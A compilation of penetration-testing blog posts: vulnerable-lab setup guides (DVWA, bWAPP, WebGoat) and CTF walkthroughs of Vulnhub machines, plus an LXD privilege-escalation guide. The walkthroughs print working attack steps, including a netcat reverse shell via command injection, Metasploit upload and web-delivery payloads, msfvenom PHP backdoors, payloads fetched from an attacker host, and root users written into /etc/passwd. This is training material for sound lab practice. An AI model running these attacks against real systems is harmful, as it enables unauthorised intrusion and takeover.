Similarly, we can run WebGoat using docker without wasting much time in manual configuration. Repeat the same step as done before, first pull the package and then use the docker to start WebGoat over a specific port.

docker pull szsecurity/webgoat

docker run -p 1337:80 szsecurity/webgoat

To access the webgoat application run following URL in the web browser.

http://localhost:1337/WebGoat

ConfigureBWAPP on Docker

A buggy web application that is purposely unsafe. Enthusiasts of security, system engineers, developers can find out about Web vulnerabilities and prevent them.

Repeat the same approach and execute following command to pull its docker image.

docker pull raesene/bwapp

then use the docker to start WebGoat over a specific port.

docker run -d -p 8080:80 raesene/bwapp

Now go to your browser and open bWAPP installation file by the following command and click on here as shown in the image below

http://localhost:8080/install.php

Now you will get a login page of bWAPP where we will use the default username which is bee and default password which is bugand you are logged in in bWAPP.

Enter the credential bee:bug and get access of the web console.

Now you can start working on bWAPP.

Another Method

We can use PentestLab Management Script because this scripts uses docker and hosts alias to make web apps available on localhost” and it can pull following applications.

· bWAPP

· WebGoat 7.1

· WebGoat 8.0

· Damn Vulnerable Web App

· Mutillidae II

· OWASP Juice Shop

· WPScan Vulnerable Wordpress

· OpenDNS Security Ninjas

· Altoro Mutual

Install and configure PentestLab Management Script

git clone https://github.com/eystsen/pentestlab.git

cd pentestLab

./pentestLab.sh --help

To check list of web application, use list option along with script.

./pentestLab.sh list

To start the web application, just write the name of web application after executable script as shown here.

./pentestLab.sh start juiceshop

Execute following URL to browse the web application.

http://127.0.0.1

http://juiceshop

Conclusion:

Vulnerable web application lab set-up using docker is very easy and fast as compared to other approach. A pen-tester can easily set up his/her own vulnerable lab using docker in a very short period of time.

Hope you liked this technique to web application configuration.

Happy Hacking!!

This is our Walkthrough for “HA: Armour” and this CTF is designed by Hacking Articles Team 😊, hope you will enjoy this.

TASK: Klaw has stolen some armours from the Avengers Super-Secret Base. Falcon has checked the manifest, following things are unaccountable:

· HulkBuster Armour

· Spiderman Armour

· Ant-Man Armour

· Black Panther Armour

· Iron Man Armour

Klaw hide all these armours and now it's up to you. Can you use your penetration skills to recover them all?

Hint:P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.

Level: Intermediate

You can download this lab from here.

Lets Begin!!

Penetration Testing Methodologies

Scanning Network

· Netdiscover

· Nmap

Enumeration

· SSH

· Abousing HTTP

· Tftp

· Dirb

· LFI

Exploiting

· Abusing Tomcat Manager (Metasploit)

· Internal Recon

Privilege Escalation

· AbusingApache2.conf

· Abusing sudo rights

Scanning Network

Firsts of all try to identify our target and for this use the following command:

netdiscover

After you have identified your target using the above command you can start with our second step by scanning the target. You can use nmap to scan the target using the following command:

nmap -p- -A 192.168.1.101

Enumeration

With the help of scanning, you can find that port numbers 80, 8009, 8080 for HTTP (apache http, apache Jserv & apache tomcat) & 65534 for SSH are opened.

You will find the first "HulkBuster" armor when connecting to SSH via port 65534 and the first hint: the Olympics as mentioned above for Klaw.

ssh 192.168.1.101 -p65534

After getting HulkBuster, it was time to dig out another Armor so you can connect to port 80 through a web browser.

Hmmmm! Well, the web page described the Armor Collection of Marvel's famous characters; but you need to dig out more so that you can get a hint.

Ahh!! So, as you can see from the image given below that from inside the source code we found 3 things i.e. “armour, 69 and notes.txt” from inside the comment.

Let’s check each hint one-by-one and identify what it says.

Assuming 69 could be a hint for any port, therefore using nmap again to decide whether or not a service is running on port 69. Therefore, we scan for the UDP protocol and give the following command:

nmap -sU -p69 192.168.1.101

Now, once you know that port 69 is open for tftp operation, you can try connecting to tftp and check the list of available files and directories.

Here you find the notes.txt file, which was mentioned above, so you need to download this file to your local machine.

tftp 192.168.1.101

get notes.txt

From inside notes.txt file, you will get the second amour which is for “Spiderman” and 2^nd Hint:maybeevenawhich was hide by Klaw.

At present you must be having two amours and two hints that we have found till now. To identify third amour or hint we are going to use dirb for brute forcing web directory to enumerate all files with .php extension.

dirb http://192.168.1.101-X .php

With the of dirb you may find a URL for /file.phppage as shown in the below image.

http://192.168.1.101/file.php

But when you browse the /file.php page, you'll see a white color page that's left blank, and it's seriously questionable why the author has left file.php blank.

And if you are aware of the Vulnerabilities web application and its Penetration Testing, then you would have known what kind of misconfiguration it is.

In such a case, it is likely that the host system or application is vulnerable to LFI (Local File Inclusion).

So, without wasting your time, you can try to access /etc/passwd like we did here and say it's vulnerable to LFI.

When you dig more and more then inside /etc/apache2/.htpasswd file you will find the third amour which for “Ant-Man” and along this 3^rd hint: StarBucks.

Now let’s recall the hint given by author:

P.S. Klaw has a habit of dividing his passwords into 3 parts and save them at different locations. So, if you get some combine them to move forward.

So, as you know that till now, we have found all 3 parts of password as Hint1, Hint2 and Hint3; let’s combined them and identify how it will help to move ahead.

http://192.168.1.101/file.php?file=/etc/apache2/.htpasswd

After combining Hint1, Hint2 and Hint3 you will have a password:

TheOlympicsmaybeevenastarBucks

As you know port 8080 is available for Apache tomcat manager and may be can login into tomcat server with the help of this password.

Exploiting Tomcat Manager

For login into tomcat manager we use following credential:

Username: Amour (found above from inside source code)

Password: TheOlympicsmaybeevenastarBucks

I hope you all are aware of Tomcat manager exploit available in Metasploit framework, if not then read complete article from here.

So, without wasting time we are straight away logged into Tomcat Server using Metasploit Tomcat Manager using the above credentials for Tomcat Server Login.

use exploit/multi/http/tomcat_mgr_upload

set rhosts 192.168.1.101

set rport 8080

set httpusername armour

set httppassword TheOlympicsmaybeevenastarBucks

exploit

Booom!! Our favorite meterpreter session is all here, let’s go for Post enumeration.

netstat -antp

If you check your local network static for TCP and UDP connections, you'll see that there's something running 8081, and even nmap doesn't display anything for this. With the aid of the meterpreter, we have forwarded service port 8081 to our local host:8081.

portfwd add -l 8081 -p 8081 -r 127.0.0.1

Once you have forwarding the service over your local machine the you can explore it the web browser as we have done here.

http://127.0.0.1:8081

This will give you the fourth amour for “Black-Panther” 😎

Privilege Escalation

This lab is like Rabbit hole where Enumeration is key for identifying loopholes or further hint. Similarly, we enumerate that /apache2.conf and /html owns writable permission.

Since we know apache2.conf has all permission therefore we’ll try to edit this file for escalating privilege of another user.

This machine has an user profile named as “aarti” that we had enumerated through /etc/passwd and now try to add a user:aarti and group:aartiinside the /etc/apache2/apache2.conf so that we will leverage it for privilege escalation. So, the idea is when we restart the apache service it will get executed with aarti user privileges.

So, we have simple copied the entire content of the apache2.conf file in our local machine and made changes as said above.

Then download the modified apache2.conf from your local machine into the host machine and replaced the original apache2.conf file as we have done here.

As you know the /html has full permission which mean inject the php backdoor in this web directory. Parallelly we grabbed a php-reverse-shell from /usr/share/webshells/php and modified the listener IP as ours and named it as shell.php.

Then downloaded the shell into /var/www/html folder so that we can access it through browser.

To make the apache service run as aarti user we have to restart the apache service, thus reboot the machine.

cd /var/www/html

wget http://192.168.1.102:8000/shell.php

After reboot is complete, we just executed the shell.php script in the browser and at the same time started a netcat listener on your kali.

nc -lvp 1234

http://192.168.1.101/shell.php

After some time, we got a reverse netcat shell on our local machine for user aarti. Now let’s check sudo rights for this user.

sudo -l

Here you can observe that it shows that user aarti has sudo right to run perl application as root which means we can try to abuse its sudo for escalating root privilege.

sudo perl -e 'exec "/bin/bash";'

Boom!! We have the root shell access, let’s find the fifth and final amour. You can find it inside the /root directory within final.txt.

cd /root

cat final.txt

And the final amour is my favorite “Iron-man” 🤗

Web Application Lab Setup on Windows

Hello friends! Today we are going to show you how you can set up a vulnerable web application server in Windows system using Xampp. Here we will be configuring the most popular web applications (DVWA, bwapp, SQLI, Mutillidae). So, let's do that.

Table of Content

Requirement

· Web application

· Xampp Server Installation in Windows

· DVWA

· bWAPP

· Sqli

· Mutillidae

Requirement-Xampp server (Windows-X64)

Web Application

A web application is a computer program that utilizes web browsers and web technology to perform tasks over the Internet. Web apps can be built for a wider use which can be used by anyone; from an enterprise to an entity for a variety of reasons. Frequently used Web applications can include webmail.

Xampp Server Installation

XAMPP stand for Apache + MariaDB + PHP + Perl

XAMPP is a free and open-source cross-platform web server solution stack package developed by Apache Friends, consisting mainly of the Apache HTTP Server, MariaDB database, and interpreters for scripts written in the PHP and Perl programming languages. Since most actual web server deployments use the same components as XAMPP, it makes transitioning from a local test server to a live server possible. (read more from wikipedia)

Download from here

Once the installation is done, we need to start the service of Mysql and Apache service in Xampp server.

DVWA

DVWA is a web application that is damn sensitive to PHP / MySQL. The main objectives are to provide security professionals with assistance to test their skills and resources in a legal environment, enable web developers to better understand the processes of protecting web applications and assist teachers / students to teach / learn protection in the classroom.

Download from here

Once the dvwa is installed completely then we will navigate to C:/Xampp/htdocs/dvwa/config.inc.php.dist to change the username and password for database.

Open the configuration file to set the Username and Password.

Now here

You can notice that the default usernameis root and password is password which we will modify.

Now here you may notice that we have set the password “blank” for user “root” . Now save these settings and quit.

Rename the file as “config.inc.php” after making above changes and save it.

Now we need to open DVWA application in our local host to create the data base.

http://localhost/dvwa/setup.php

Now click on create data base and database is created.

Now click on login and you are done with the set up.

For login, we will use the DVWA username which is admin and password which is DVWA password by default.

Bwapp

Now let’s set up a new lab which is BWAPP.

BWAPP is a free, open source and intentionally unreliable web application, or a web buggy program. It helps security enthusiasts, designers and students discover Web bugs and stop them from doing so. BWAPP plans for positive penetration tests and cyber ethics initiatives.

Download it from here.

Now navigate to “C:/Xampp/htdoc/bwapp/admin”folder to change the default username and password for the database.

Now you can see that the default username is root and password is bug which we will modify.

Now here the username is rootand password we have set blank. Now save the settings and quit.

Now let’s open “bwapp/install.php” in the local host and click on “here” to complete the installation.

Now the installation is complete.

When you will login as bee:bug; you will get the portal to test your penetration testing skill

Here you can click on bugs and all bugs will be displayed to you which are there in bwapp web application.

SQLI

SQLi: A facility that provides a robust testing environment for those involved in SQL injection acquisition and enhancement. Let's start. First, we will download SQLI lab through GitHub.

Now we will navigate to C:/htdocs/sqlilabs/sqli-connectionsto edit the setup-db.php.

Now here we will set the password “blank” and save the changes and then quit.

Now browse this web application from through this URL: localhost/sqli and click on Setup/resetDatabases for labs.

Now the sqli lab is ready to use. Now a page will open up in your browser which is an indication that we can access different kinds of Sqli challenges

Now you can see that we have opened lesson 1. So, we have successfully set Sqli labs for practice.

Mutillidae

OWASP Mutillidae is an open source web application that is intentionally vulnerable and actively aims at web security. It's a laboratory for those involved in SQL injection acquisition and development, which offers a full test environment. This internet hacking framework is simple to use and is designed for labs, safety lovers, schools, CTFs and vulnerability assessments.

First, we will navigate to “C:/Xampp/htdocs/mutillidae/includes” to edit the “database-config.php” as shown below.

Here we can see that password is set mutillidae which we will replace with blank.

You can view that we have set the password “blank”.Now save the settings and quit.

Now you can see the page where you need to click on opt out tap.

Now we will open this our local browser by the following URL: localhost/mutillidae where we will find an option of reset database. Just click on it to reset the database. So, In this way, we can setup our vulnerable web application lab for penetration testing.

Now you will be redirected to a page which will ask you to click ok to proceed. Here you need to click on OK and you are done with the configuration of the Mutillidae lab.

We have successfully set all the web applications in Xampp server in Windows.

Misdirection 1 VM is made by FalconSpy. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to get root and to read the root flag.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

· netdiscover

· nmap port scan

Enumeration

· Browsing HTTP Service

· Performing Directory Bruteforce

Exploiting

· Command Injection

Privilege Escalation

· Writable etc/passwd File

Walkthrough

Network Scanning

The first step to attack is to identify the target. So, identify your target. To identify the target, we will use the following command:

netdiscover

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.

nmap -A 192.168.1.106

We learned from the scan that we have the port 80 open which is hosting Rocket httpd service, and we have the port 22 open. This tells us that we also have the OpenSSH service running on the target machine. We also have 3306 which hints us to a database situation. Also, we have the Apache httpd running on the port 8080.

Enumeration

Further, we need to start enumeration against the host machine, therefore we navigated to a web browser for exploring HTTP service. We have a webpage with some links here. We did some poking around but we figured out that the lab’s name is not a random name. It wants us to be misdirected. So, this is definitely a rabbit hole.

Back to out nmap port scan, we saw that the Apache httpd service is running on port 8080. So, we thought there might be something worthwhile there. But it is just the Apache It works page. Another Misdirection.

http://192.168.1.106:8080

For now, let’s try Directory Bruteforce using dirb. This surprisingly gave us pages with the name debug, shell and wordpress. All of these seems interesting.

dirb http://192.168.1.106:8080/

We soon figured out that wordpress was also another misdirection. This lab is full of rabbit holes. Now we found the debug page. On further inspection we see that there is a virtual shell running on this page. This could possibly our way in.

Now that we have a working virtual shell, let’s try to get a real shell using our good old friend Metasploit. We used the web_delivery exploit with the php reverse_tcp payload.

msf5 > use exploit/multi/script/web_delivery

msf5 exploit (multi/script/web_delivery) > set target 1

msf5 exploit (multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp

msf5 exploit (multi/script/web_delivery) > set lhost 192.168.1.105

msf5 exploit (multi/script/web_delivery) > exploit

This gave us a beautiful PHP script that we could use to exploit the target machine.

Now back to our virtual shell in our browser. We pasted the PHP code that Metasploit generated. We executed this script on this shell. This should give us a meterpreter shell. We went back on out Metasploit terminal to check.

And Of course, we have the meterpreter shell. This exploit mostly works in situation similar to this. We interacted with the meterpreter session using the sessions command. Then after getting onto the meterpreter we used the “shell” command to get a shell on the target system. This came back to be an improper shell. Now we got to use our python one liner to invoke a proper shell on the target machine. After getting the shell we saw that the shell we got is of user “www-data”. This means the story is not yet over. We have to work our way around to get an elevated privilege shell on the target machine. To escalate privilege, first we got to enumerate the rights of this user. We did that using the “sudo -l” command.

msf5 exploit (multi/script/web_delivery) > sessions 1

meterpreter > shell

python -c 'import pty;pty.spawn("/bin/bash")'

www-data@misdirection:/var/www/html/debug$ sudo -l

www-data@misdirection:/var/www/html/debug$ sudo -u brexit /bin/bash

brexit@misdirection:/var/www/html/debug$

Here we observed that it shows that user www-data has sudo rights to login as user named brexit without any password. Now using the sudo -u command we invoked a shell of user brexit.

As a part of our Enumeration for Escalating Privilege on the target machine, we try to find if the /etc/passwd is writable. We can see that the file is in fact writable as the user brexit. This is our way to move forward.

brexit@misdirection:~$ ls -la /etc/passwd

Now we going to need the password hash for the user that we are going to create on the target machine by making an entry in the /etc/passwd file. We are going to use the openssl to generate a salted hash.

openssl passwd -1 -salt user3 pass123

Now back to our remote shell on the target machine. Here we are going to use the hash that we generated in the previous step and make a user raj which has the elevated privilege. We used the echo command to make an entry in the /etc/passwd file. After making an entry we checked the entry using the tail command. Now all we got to do is run su command with the user name we just created and enter the password and root shell.

brexit@misdirection:~$ echo 'raj:$1$user3$rAGRVf5p2jYTqtqOW5cPu/:0:0::/root:/bin/bash'>>/etc/passwd

brexit@misdirection:~$ tail /etc/passwd

brexit@misdirection:~$ su raj

pass123

root@misdirection:/home/brexit# cd /root

root@misdirection:~# ls

root@misdirection:~# cat root.txt

Now that we got the root shell, let’s enumerate further for the root flag. We found one in the home directory of the root user.

bossplayersCTF 1 VM is made by Cuong Nguyen. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to get root and to read the root flag.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

· netdiscover

· nmap port scan

Enumeration

· Browsing HTTP Service

· Performing Directory Bruteforce

· Decoding Encoded Text

Exploiting

· Command Injection

Privilege Escalation

· SUID on find command

Capture the flag

Walkthrough

Network Scanning

The first step to attack is to identify the target. So, identify your target. To identify the target, we will use the following command:

netdiscover

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.

nmap -A 192.168.1.107

Enumeration

Further, we need to start enumeration against the host machine, therefore we navigated to a web browser for exploring HTTP service. Here we have the description of the machine that tells us that this is an extremely easy CTF. It is for those who are getting started with the CTFs. It also tells us that there might be rabbit holes. So we will try to avoid those.

Now as convention, we checked the source code of the webpage in hope to get some valuable hint to move forward with our enumeration. Here, we got an encoded value. This might lead us somewhere.

But we wanted to further enumerate with a directory bruteforce. To do this we will use the dirb. With this directory bruteforce scan, we got a robots.txt file. On browsing it on our web browser we see that we have another encoded text titled as super-secret password. We decoded it to find a troll message “lol try harder bro”. This might be the rabbit hole mentioned earlier.

drib http://192.168.1.107/

We went back to the commented encoded text we found earlier in the Source code of the webpage. It seemed like Base64, so we tried to decode it using base64 command. It gave back another encoded text. This also seemed like Base64, so we decoded it again. This gave back another encoded text. This is getting real tiring. Now we decoded it again to find workinginprogress.php. Not this seems important. All those decoding was not gone for waste.

echo "WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK" | base64 -d

ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K

echo "ZDI5eWEybHVaMmx1Y0hKdlozSmxjM011Y0dod0NnPT0K" | base64 -d

d29ya2luZ2lucHJvZ3Jlc3MucGhwCg==

echo "d29ya2luZ2lucHJvZ3Jlc3MucGhwCg==" | base64 -d

We tried to open this file on our Web Browser as shown in the image given below. It was a check list of some kind. It showed that Linux Debian is installed, Apache2 is installed and PHP is also installed. But the stuff that’s not completed is test the ping command and fix the privilege escalation. These seems like major hints.

http://192.168.1.107/workinginprogress.php

As it said test the ping command, it got use thinking that this might in fact be command injection. To further inspect this suspicion, we tried to run the id command through the URL as shown in the image given below. This made our suspicion true. This in fact is Command Injection.

http://192.168.1.107/workinginprogress.php?cmd=id

To exploit command injection, we will be using the netcat invoke shell one liner. Before running that we need a netcat listener to receive the shell that is going to be invoked.

nc -lvp 1234

After running the listener, we went back to our browser, and here instead of the id command that we ran previously, it was time to run the shell invocation command. Here we invoked bin/bash shell to the IP Address 192.168.1.105 [Kali Linux]. With the port that we started the listener with.

http://192.168.1.107/workinginprogress.php?cmd=nc -e /bin/bash 192.168.1.105 1234

Now, we went back to our terminal, where we ran the netcat listener. We see that we have successfully got a session. But the shell that came with the session is an improper one. So in order to convert in into a proper shell, we ran the python one liner. This gave us a proper shell. As soon as we got this shell, we saw that the session that we got is of user www-data. This means that this is an unprivileged shell. We will have to work out way to that elevated privilege shell. For this we start to enumerate the target machine through the shell we got.

python -c 'import pty;pty.spawn("/bin/bash")'

www-data@bossplayers:/var/www/html$ find / -perm -u=s -type f 2>/dev/null

/usr/bin/find

As a part of our enumeration procedure, we ran the find command with -perm parameter to search for any file having SUID permissions. The find command itself has this permission. This made out job a little easy.

We ran the find command and tried to invoke the /bin/sh shell using it as shown in the image given below. This gave back us a root shell. We confirmed this is a root shell by running the id command.

www-data@bossplayers:/var/www/html$ find . -exec /bin/sh -p \; -quit

# id

# cd /root

# ls

# cat root.txt

Now we wanted to enumerate for the Root Flag. We went into the home directory of the root user. Here we found the file named root.txt. On opening it we got a base64 encoded text. It said “congratulations”. This concludes this CTF Challenge.

NOTE: Here we ran typed the command as simply we enter. The shell however just prints what we type again with it. So it gave the look as shown in the image.

In this post we are going to describes how an account on the system that is member of the lxd group is able to escalate the root privilege by exploiting the features of LXD.

A member of the local `lxd` group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package.

LXD is a root process that carries out actions for anyone with write access to the LXD UNIX socket. It often does not attempt to match privileges of the calling user. There are multiple methods to exploit this.

One of them is to use the LXD API to mount the host's root filesystem into a container which are going to use in this post. This gives a low-privilege user root access to the host filesystem. This is demonstrated in the exploit attached.

Table of content

· Introduction to LXD and LXC

· Container Technology

· LXD Installation and Configuration

Introduction to LXD and LXC

Linux Container (LXC) are often considered as a lightweight virtualization technology that is something in the middle between a chroot and a completely developed virtual machine, which creates an environment as close as possible to a Linux installation but without the need for a separate kernel.

Linux daemon (LXD) is the lightervisor, or lightweight container hypervisor. LXD is building on top of a container technology called LXC which was used by Docker before. It uses the stable LXC API to do all the container management behind the scene, adding the REST API on top and providing a much simpler, more consistent user experience.

Caintainer Technology

Container technology cames from container, is a procedure to assemble an application so that it can be run, with its requirements, in isolation from other processesContainer applications with names like Docker and Apache Mesos ' popular choices have been introduced by major public cloud vendors including Amazon Web Services, Microsoft Azure and Google Cloud Platforms.

Requirement

Host machine : ubuntu 18:04

Attacker machine : Kali Linux or any other Machine

Let’s Begin !!

So here you can observe that we have a profile for user “raj” as a local user account on the host machine

LXD Installation and Configuration

Now install lxd by executing following command:

apt install lxd

Also, you need to install some dependency for lxd:

apt install zfsutils-linux

Now to add profile for user: raj into the lxd group, type following command:

usermod --append --groups lxd raj

So now you can observe user “raj” is part of lxd groups.

Now you can configure LXD and start the LXD initialization process with the lxd init command. During initialization it will ask for choosing some option, here majorly we have gone with DEFAULT options. But for the storage backend we have choose “dir” instead of zfs.

Once you have configured the lxd then you can create a container using lxc. Here we are creating a container for ubuntu:18.04 and named it “intimate-seasnail”. Further lxc list to view the available installed containers.

lxc launch ubuntu:18.04

intimate-seasnail

lxc list

Connect to the container with lxc exec command, which takes the name of the container and the commands to execute:

lxc exec intimate-seasnail -- /bin/bash

Once inside the container, your shell prompt will look like as following below.

Privilege Escalation

Privilege escalation through lxd requires the access of local account therefore we choose SSH to connect and take the access local account on host machine.

Note: the most important condition is that the use should be the member of lxd group.

In order to take escalate the root privilege of the host machine you have to create an image for lxd thus you need to perform following action:

1. Steps to be perform on attacker machine:

· Download build-alpine in your local machine through git repository.

· Execute the script “build -alpine” that will build latest Alpine image as compressed file, this step must be executed by root user.

· Transfer the tar file to the host machine

2. Steps to be perform on host machine:

· Download the alpine image

· Import image for lxd

· Initialize the image inside a new container.

· Mount the container inside the /root directory

So, we downloaded the build alpine using the github repo.

git clone https://github.com/saghul/lxd-alpine-builder

cd lxd-alpine-builder

./build-alpine

On running the above command, a tar.gz file is created in our working directory that we have transfer to the host machine.

python -m SimpleHTTPServer

On other hand we will download the alpine-image inside /tmp

wget http://192.168.1.107:8000/apline-v3.10-x86_64-20191008_1227.tar.gz

After the image is built it can be added as an image to LXD as follows:

lxc image import ./ apline-v3.10-x86_64-20191008_1227.tar.gz --alias myimage

use list command to check the list of images

lxc image list

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/etc/shadow path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

lxc start ignite

lxc exec ignite /bin/sh

Once inside the container, navigate to /mnt/root to see all resources from the host machine.

After running the bash file. We see that we have a different shell, it is the shell of the container. This container has all the files of the host machine. So, we enumerated for the flag and found it.

mnt/root/root

flag.txt

cat flag.txt

Source: https://bugs.launchpad.net/ubuntu/+source/lxd/+bug/1829071

Hacker Fest:2019 VM is made by Martin Haller. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of easy level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to get root and to read the root flag.

Level: Easy

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

· Network Scanning

o Nmap port scan

· Enumeration

o Browsing HTTP Service

o Scanning Wordpress (wpscan)

· Exploiting

o Wordpress Google Maps Plugin SQL Injection

o Wordpress_admin_shell_upload exploit

· Privilege Escalation

o Abusing Sudo Rights

Walkthrough

Network Scanning

Starting with netdiscover, to identify host IP address and thus we found 192.168.0.20. let’s now go for advance network scanning using the nmap Aggressive scan.

nmap -A 192.168.0.20

We learned from the scan that we have the port 80 open which is hosting Apache httpd service, and we have the ports 21 and 22 open. This tells us that we also have the FTP service, SSH Service running on the target machine.

Enumeration

Since we got the port 80 open, we decided to browser the IP Address in the web browser.

This gave us a site that looks like a WordPress site, it’s time to perform a wpscan on the target machine.

wpscan --url http://192.168.0.20/wordpress

If we move further down in the wpscan result we find the WordPress google map plugin. It is not updated. So, this could help us. Let’s try and exploit it.

Exploiting Google Map Exploit

We searched the google maps on our Metasploit Framework. This gave us this exploit. This exploit works on a SQL injection vulnerability in a REST endpoint registered by the WordPress plugin wp-google-maps between 7.11.00 and 7.11.17 (included). As the table prefix can be changed by administrators, set DB_PREFIX accordingly.

msf5 > use auxiliary/admin/http/wp google_maps_sqli

msf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 192.168.0.20

msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit

So, we got the following hash through the sql injection that was on the target machine.

webmaster $P$Bsq0diLTcye6ASlofreys4GzRlRvSrl

Whenever we get some hashes all we remember is our best friend John The Ripper. The hashes were saved in a file named ‘hash’. We ran it through john. After working on it for some time. John cracked one of the hashes, it came out to be ‘kittykat1’.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

The very first method that we have is Metasploit framework, this module takes an administrator username and password, logs into the admin panel, and uploads a payload packaged as a WordPress plugin. Because this is authenticated code execution by design, it should work on all versions of WordPress and as a result, it will give meterpreter session of the webserver.

msf5 > use exploit/unix/webapp/wp_admin_shell_upload

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts 192.168.0.20

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username webmaster

msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password kittykat1

msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit

meterpreter > shell

python -c 'import pty;pty.spawn("/bin/bash")'

su webmaster

Password: kittykat1

Great!! It works wonderfully and you can see that we have owned the reverse connection of the web server via meterpreter session.

Privilege Escalation

On the other hands start your attacking machine and first compromise the target system and then move to the privilege escalation phase. After successful login in the victim’s machine now executes below command to know sudo rights for the current user.

sudo -l

sudo su

cd /root

cat flag.txt

The LAMPSecurity project is an effort to produce training and benchmarking tools that can be used to educate information security professionals and test products. Please note there are other capture the flag exercises too.

These exercises can be used for training purposes by following this documentation. Alternatively, you may wish to test new tools, using the CTF virtual machines as targets. This is especially helpful in evaluating the effectiveness of vulnerability discovery or penetration testing tools.

Download from Here.

Penetration Testing Methodology

· Network Scanning

o netdiscover

o nmap port scan

· Enumeration

o Performing Directory Bruteforce

o Exploring directories to find out the username and password

· Exploiting

o Using a backdoor

o Using netcat/msfconsole

· Privilege Escalation

o Changing the password of root and other users

Walkthrough

Network Scanning

The first step to attack is to identify the target. So, to identify the target, we will use the following command:

netdiscover

Now we will use nmap to gain information about the open ports and the services running on the target machine using the following command

nmap -sV -sT -p- 192.168.43.30

Enumeration

Further, we need to start enumeration against the host machine, therefore we navigated to a web browser for exploring different service. Here we have a web application so let’s explore the web application.

http://192.168.43.30

Further, let’s try to find some hidden files and directories. Finding files and directories can discover much useful information like username, password or some configuration files, etc. We will use the following command for the said:

dirb http://192.168.43.30

We found two major directories i.e. /files/ and /sql/. We can tell from their names that are quite important.

Now our next step is to explore these two directories. We can also explore other directories but the rest of the directories don’t seem to be useful for us.

http://192.168.43.30/files/

On exploring the files/ directory there multiple valid and useful files we found with a lot of information as you can see in the image below:

http://192.168.43.30/sql/db.sql/

Upon traversing through sql/ directory, we found a db.sql and when opened it gave us all the information about the database including username and password just as shown in the image below:

Now let’s try to login into the admin panel using the username: ‘admin’ and password: ‘adminpass’

We succeed in login. Now we have the admin panel from where we can manage the web application. Let’s see if we can add some more pages to the application so that we can upload a PHP backdoor.

As we can add a new event, so, here we will create a backdoor using msfvenom first and then we will upload this shell.php file on the website. To create the shell type:

msfvenom -p php/meterpreter/reverse_tcp -o /root/Music/shell.php lport=4444 lhost=192.168.43.248

After this, upload the shell by adding a new event as shown in the image below:

Finally, we have uploaded a malicious file. Now we will use msfconsole or we can also use netcat to get a session in order to perform more operations to gain root access.

So, to access the ‘shell.php’ we will explore the directory URL: http://192.168.43.30/files/

Now let’s fire up the msfconsole and we have to type in these commands in msfconsole to get a session

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set lhost 192.168.43.248

msf5 exploit(multi/handler) > set lport 4444

msf5 exploit(multi/handler) > exploit

Press enter after typing ‘exploit’ and go back to the URL: http://192.168.43.30/files/

And click on ‘shell.php’ and then come back to the msfconsole, now we can see we have got a session.

Now we have a session, so let’s run the command ‘sysinfo’ to find out some information related to kernel version and its architecture.

sysinfo

Kernel version is 2.6.18-92.el5 .

We have to search a lot to know more about this kernel version and after doing a lot of research we find out that this kernel version is vulnerable to udev exploit.

Now, we will use a script to gain root access, script name is 8478.sh, we can find this exploit/code in our Kali Linux OS.

Let’s copy this file from our OS to the directory where we have created our backdoor that is /root/Music using the cp command:

cp /usr/share/exploitdb/exploits/linux/local/8478.sh /root/Music

cd /root/Music/

ls -l

Now, let’s run a simple HTTP Server using python so that we can download this file in our targeted system.

python -m SimpleHTTPServer

Now let’s drop a shell in our targeted system using the same meterpreter session

sysinfo

This is a very limited shell. using this shell, we can’t do privilege escalation. Now for gaining a more advance shell, we will use python’s pty module using the following command

python -c 'import pty; pty.spawn("/bin/bash")'

Now we have a shell where we can try different commands to gain root access. First of all, let’s change the directory to /tmp using the cd command

cd /tmp

pwd

Now we have to download 8478.sh file here so that we can exploit the system. We can download the file using wget command:

wget http://192.168.43.248:8000/8478.sh -q

Now change the permissions to executable using the chmod command:

chmod +x 8478.sh

It’s time to run the script and gain the root access, run the script using ‘./8478.sh’

./8478.sh

Many of us will get this error. We will search for this error and finally we have found a solution to this error we can resolve this issue using the following command:

sed -i -e 's/\r$//' 8478.sh

Try again to run the script using:

./8478.sh

The reason behind this error is, it requires some experimentation as you have to provide the proper PID to the script in order for the code to work. So now we have to find a proper PID and with the help of that PID, we will run the script. To get the PID run the following command:

cat /proc/net/netlink

Run the script again using the PID 376 using the command below:

./8478.sh 376

whoami

Boom! We have gained the root access!

Let’s do some more operations. Head into the /home directory using command cd /home. In the home directory, we have to find out more users. As we are root, we can change any user password using the command passwd john similarly we can change the root password using the same command.

passwd root

su john

su -l

Author: Yash Saxena an undergraduate student pursuing B. Tech in Computer science and engineering with a specialization in cybersecurity and forensics from DIT University, Dehradun. Contact here.

In this article, we will learn the process of installing an Apache Tomcat on any Linux Machine. We will also learn how to gain control over our victim’s PC through exploiting Apache Tomcat.

